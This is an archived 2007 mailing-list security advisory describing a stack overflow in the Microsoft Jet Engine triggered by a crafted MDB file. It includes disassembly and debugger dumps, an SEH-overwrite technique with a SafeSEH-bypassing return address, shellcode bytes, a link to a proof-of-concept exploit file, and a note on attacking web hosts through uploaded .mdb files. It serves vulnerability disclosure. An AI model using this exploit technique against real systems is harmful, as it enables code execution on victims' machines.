lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Fri, 16 Nov 2007 19:25:29 +0800
From: cocoruder <cocoruder@...il.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Microsoft Jet Engine MDB File Parsing Stack Overflow Vulnerability

Microsoft Jet Engine MDB File Parsing Stack Overflow Vulnerability

by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net


Summary:

    A remote code execute vulnerability exists in Microsoft Jet
Engine. A remote attacker who successfully exploit this vulnerability
can execute arbitrary code on the affected system.


Affected Software Versions:

    Microsoft Office Access 2003 sp3 on Windows XP SP2(chinese)
    (Other versions may also be affected)



Details:

    When Microsoft Office Access parsing a MDB file, it will call the
Jet Engine (msjet40.dll) to parse it. See the attched file
"Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.mdb", it will cause a
stack overflow vulnerability finally in the following codes:

    (C:\Windows\System32\msjet40.dll, version is 4.0.8618.0)

    .text:1B0B72BB                 mov     ecx, edx        ; ecx=0x5200
    .text:1B0B72BD                 mov     esi, edi        ; esi point
to the datas
    .text:1B0B72BF                 mov     ebp, ecx           ; which
can be find in the mdb file
    .text:1B0B72C1                 lea     edi, [esp+40h]  ; edi point
to stack memory
    .text:1B0B72C5                 shr     ecx, 2
    .text:1B0B72C8                 rep movsd               ; stack overflow!!
    .text:1B0B72CA                 mov     ecx, ebp
    .text:1B0B72CC                 mov     eax, [eax+1]
    .text:1B0B72CF                 and     ecx, 3
    .text:1B0B72D2                 rep movsb


    Debug Informations as follows:

    eax=05f5cb67 ebx=05e66458 ecx=00005200 edx=00005200 esi=05f5cd12
edi=0013db60
    eip=1b0b72c5 esp=0013db20 ebp=00005200 iopl=0         nv up ei pl
nz ac pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00000216
    msjet40!Ordinal55+0x23cd8:
    1b0b72c5 c1e902          shr     ecx,2
    0:000> u eip
    msjet40!Ordinal55+0x23cd8:
    1b0b72c5 c1e902          shr     ecx,2
    1b0b72c8 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
    1b0b72ca 8bcd            mov     ecx,ebp
    1b0b72cc 8b4001          mov     eax,dword ptr [eax+1]
    1b0b72cf 83e103          and     ecx,3
    1b0b72d2 f3a4            rep movs byte ptr es:[edi],byte ptr [esi]
    1b0b72d4 8bb424d4000000  mov     esi,dword ptr [esp+0D4h]
    1b0b72db 8b4b28          mov     ecx,dword ptr [ebx+28h]
    0:000> db esi
    05f5cd12  00 4f 00 53 00 7e 00 31-00 5c 00 56 00 42 00 41  .O.S.~.1.\.V.B.A
    05f5cd22  00 5c 00 56 00 42 00 41-00 36 00 5c 00 56 00 42  .\.V.B.A.6.\.V.B
    05f5cd32  00 45 00 36 00 2e 00 44-00 4c 00 4c 00 23 00 56  .E.6...D.L.L.#.V
    05f5cd42  00 69 00 73 00 75 00 61-00 6c 00 20 00 42 00 61  .i.s.u.a.l. .B.a
    05f5cd52  00 73 00 69 00 63 00 20-00 46 00 6f 00 72 00 20  .s.i.c. .F.o.r.
    05f5cd62  00 41 00 70 00 70 00 6c-00 69 00 63 00 61 00 74  .A.p.p.l.i.c.a.t
    05f5cd72  00 69 00 6f 00 6e 00 73-00 00 00 00 00 00 00 00  .i.o.n.s........
    05f5cd82  00 00 00 00 00 12 01 2a-00 5c 00 47 00 7b 00 34  .......*.\.G.{.4
    0:000> db edi
    0013db60  09 00 00 00 01 00 00 00-18 00 00 00 9a 51 00 1b  .............Q..
    0013db70  86 ce 00 1b 00 c0 f5 05-02 00 00 00 e8 dc 13 00  ................
    0013db80  22 7c 00 1b 0c 11 f4 05-e8 dc 13 00 c0 10 f4 05  "|..............
    0013db90  3c cd 00 1b c0 10 f4 05-00 c0 f5 05 9c 78 e6 05  <............x..
    0013dba0  e8 dc 13 00 05 10 92 7c-38 78 e6 05 eb cb 00 1b  .......|8x......
    0013dbb0  80 9f a4 05 b0 98 a4 05-01 00 00 00 f2 cb 00 1b  ................
    0013dbc0  9c 78 e6 05 e8 dc 13 00-4c dc 13 00 4c dc 13 00  .x......L...L...
    0013dbd0  01 00 00 00 60 f3 00 1b-80 9f a4 05 02 00 00 00  ....`...........


    The length of 0x5200 is enough to make us to write datas to the
address where the SEH handle pointer is, so that we can rewrite the
SEH handle. I use following address to jump to shellcode:

    1B0D4C42    FF55 0C         call    dword ptr [ebp+C]

    This address is also in msjet40.dll, so it can bypass the security
feature of SEH in Windows XP SP2, and [ebp+0Ch] happens to point to
the source data.

    Debug Informations:

    eax=00000000 ebx=00000000 ecx=1b0d4c42 edx=7c9237d8 esi=00000000
edi=00000000
    eip=1b0d4c42 esp=0013d750 ebp=0013d770 iopl=0         nv up ei pl
zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00000246
    msjet40!Ordinal310+0x17e:
    1b0d4c42 ff550c          call    dword ptr [ebp+0Ch]
ss:0023:0013d77c=0013e184
    0:000> dd ebp
    0013d770  0013d820 7c92378b 0013d838 0013e184
    0013d780  0013d854 0013d80c 1b0d4c42 00140000
    0013d790  0013d838 0013e184 7c957860 0013d838
    0013d7a0  0013e184 0013d854 0013d80c 1b0d4c42
    0013d7b0  00140000 0013d838 05f5f1b2 00000000
    0013d7c0  00000000 05e66458 01000000 0013d774
    0013d7d0  01c8281c 0013da04 7c92ee18 7c98d8a8
    0013d7e0  ffffffff 7c98d886 7c969d18 04ba0000
    0:000> db 0013e184
    0013e184  75 06 74 04 42 4c 0d 1b-fc e8 44 00 00 00 8b 45  u.t.BL....D....E
    0013e194  3c 8b 7c 05 78 01 ef 8b-4f 18 8b 5f 20 01 eb 49  <.|.x...O.._ ..I
    0013e1a4  8b 34 8b 01 ee 31 c0 99-ac 84 c0 74 07 c1 ca 0d  .4...1.....t....
    0013e1b4  01 c2 eb f4 3b 54 24 04-75 e5 8b 5f 24 01 eb 66  ....;T$.u.._$..f
    0013e1c4  8b 0c 4b 8b 5f 1c 01 eb-8b 1c 8b 01 eb 89 5c 24  ..K._.........\$
    0013e1d4  04 c3 31 c0 64 8b 40 30-85 c0 78 0c 8b 40 0c 8b  ..1.d.@...x..@..
    0013e1e4  70 1c ad 8b 68 08 eb 09-8b 80 b0 00 00 00 8b 68  p...h..........h
    0013e1f4  3c 5f 31 f6 60 56 89 f8-83 c0 7b 50 68 7e d8 e2  <_1.`V....{Ph~..


    Content at [ebp+0c]:

    |75 06| + |74 04| + |42 4C 0D 1B| + |FC E8 44 00 ...

    {JNZ 6} + {JZ 4} + 1B0D4C42h + shellcode

    Related content in the attached file
"Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.mdb" is from the offset
0x3336 of beginning of the file.

    Notice that because the vulnerability is in the Jet Engine, some
web space providers may also be affected, the attacker can upload the
.asp and .mdb file, and exploit it via the Server Object
"ADODB.Connection".



How to Reproduce:

    Open the attached file
"Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.mdb" with Office Access
2003 sp3 on Windows XP SP2, then "calc.exe" will be executed, please
do not use the exploit for attacking.

    The attached file is at:

    http://ruder.cdut.net/attach/MS_MDB_Vul/Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar

    MD5 Hash:73243B8823C8DC2C88AE0529CA13C4C6


Vendor Response:

    Microsoft replied me that they would not fix this vulnerability,
it looks like they will not acknowledge vulnerabilities which are from
.mdb file.

    "You appear to be reporting an issue with a file type Microsoft
considers to be unsafe. Many programs, such as Internet Explorer and
Outlook, automatically block these files. For more information, please
visit http://support.microsoft.com/kb/925330"


Disclosure Timeline:

    2007.11.06        Vendor notified via email
    2007.11.07        Vendor responded
    2007.11.16        Advisory released



--EOF--

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ